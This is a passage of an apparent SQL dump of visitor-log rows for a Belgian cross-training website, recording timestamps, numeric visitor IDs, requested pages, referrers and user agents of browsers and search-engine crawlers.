(71066, 1493570887.717817, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71067, 1493570888.158980, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71068, 1493570888.610300, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71069, 1493570889.045220, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71070, 1493570889.503701, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71071, 1493571255.389153, 1741628807, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(71072, 1493579655.741099, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71073, 1493579656.299765, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71074, 1493579656.740570, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71075, 1493579657.156023, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71076, 1493579657.613197, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71077, 1493579658.029267, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71078, 1493579658.632335, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71079, 1493579659.080976, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71080, 1493579659.497397, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71081, 1493579659.929904, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71082, 1493579660.360346, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71083, 1493589023.263605, 3657084251, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71084, 1493591249.018958, 1572356835, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://hundejo.com/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'),
(71085, 1493597883.015824, 2637637384, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71086, 1493597883.051059, 2637637384, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71087, 1493598358.929547, 3657084251, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71088, 1493612156.145749, 1338306177, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71089, 1493614686.438109, 1338306177, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71090, 1493617955.740887, 1338306177, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71091, 1493621760.584921, 1538649748, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(71092, 1493622885.447823, 1338306177, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71093, 1493631227.627202, 1834495119, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(71094, 1493631229.864642, 1834495119, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(71095, 1493631256.887690, 1834495119, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(71096, 1493631281.536185, 1834495119, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(71097, 1493631283.583589, 1834495119, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(71098, 1493631517.487769, 1338306177, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71099, 1493634986.528688, 3024883597, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(71100, 1493637742.725377, 1538649748, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(71101, 1493638299.134230, 1837906296, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A310F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71102, 1493638300.934818, 1837906296, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A310F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71103, 1493641128.031193, 676177808, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71104, 1493641128.145757, 676177808, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71105, 1493643040.319294, 1355294142, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71106, 1493643041.143318, 1355294142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71107, 1493647776.886585, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71108, 1493648255.102141, 1355389698, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71109, 1493648256.708002, 1355389698, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71110, 1493648268.313439, 1355389698, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71111, 1493649681.582652, 2071806885, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36'),
(71112, 1493649709.953281, 3702862679, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36'),
(71113, 1493649864.173245, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71114, 1493649866.217441, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71115, 1493649875.375794, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71116, 1493649891.354337, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71117, 1493649891.874034, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71118, 1493649892.412076, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71119, 1493649894.044735, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71120, 1493649895.005042, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71121, 1493649896.936640, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71122, 1493649897.448798, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71123, 1493649898.018070, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71124, 1493650208.084944, 1538699446, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(71125, 1493650208.880149, 1538699446, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(71126, 1493650234.615379, 1538699446, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(71127, 1493650241.931708, 1538699446, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(71128, 1493650246.347254, 1538699446, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(71129, 1493650250.836541, 1538699446, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(71130, 1493650584.030445, 786802763, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(71131, 1493652491.477251, 100662543, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(71132, 1493652491.479145, 1570674703, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(71133, 1493652495.220622, 2366158608, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(71134, 1493652964.220924, 1834516790, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(71135, 1493652965.381451, 1834516790, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(71136, 1493652973.506053, 1834516790, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(71137, 1493652981.354091, 1834516790, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(71138, 1493653010.673718, 1834516790, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'),
(71139, 1493653802.029352, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71140, 1493653802.715781, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71141, 1493653803.184746, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71142, 1493653803.694909, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71143, 1493653804.138371, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71144, 1493653804.606086, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71145, 1493653805.175219, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71146, 1493653805.621492, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71147, 1493653806.064813, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71148, 1493653806.534002, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71149, 1493653807.088698, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71150, 1493654009.304895, 2071807832, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(71151, 1493657602.369268, 2760155399, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71152, 1493657631.130683, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71153, 1493671388.947705, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71154, 1493671389.538827, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71155, 1493671390.021043, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71156, 1493671390.473976, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71157, 1493671391.326019, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71158, 1493671392.134962, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71159, 1493671393.654487, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71160, 1493671394.915124, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71161, 1493671395.445132, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71162, 1493671395.915541, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71163, 1493671396.330058, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71164, 1493671396.794943, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71165, 1493671397.545735, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71166, 1493671398.075418, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71167, 1493679436.827550, 1123632467, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71168, 1493679437.376480, 1123632467, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71169, 1493684407.199255, 2637637377, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71170, 1493684407.256330, 2637637377, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71171, 1493685814.721215, 1123632436, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71172, 1493685815.750079, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71173, 1493685816.201580, 1123632454, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71174, 1493703037.120902, 3652617267, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71175, 1493703812.593606, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71176, 1493705420.322989, 2901740117, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(71177, 1493710534.260042, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71178, 1493715410.325030, 1584237938, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71179, 1493718260.277292, 1837860862, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71180, 1493718262.869640, 1837860862, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71181, 1493718267.195093, 1837860862, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71182, 1493718267.887562, 1837860862, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71183, 1493718268.343342, 1837860862, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71184, 1493718963.082610, 1753445547, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(71185, 1493718968.166657, 1753445547, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
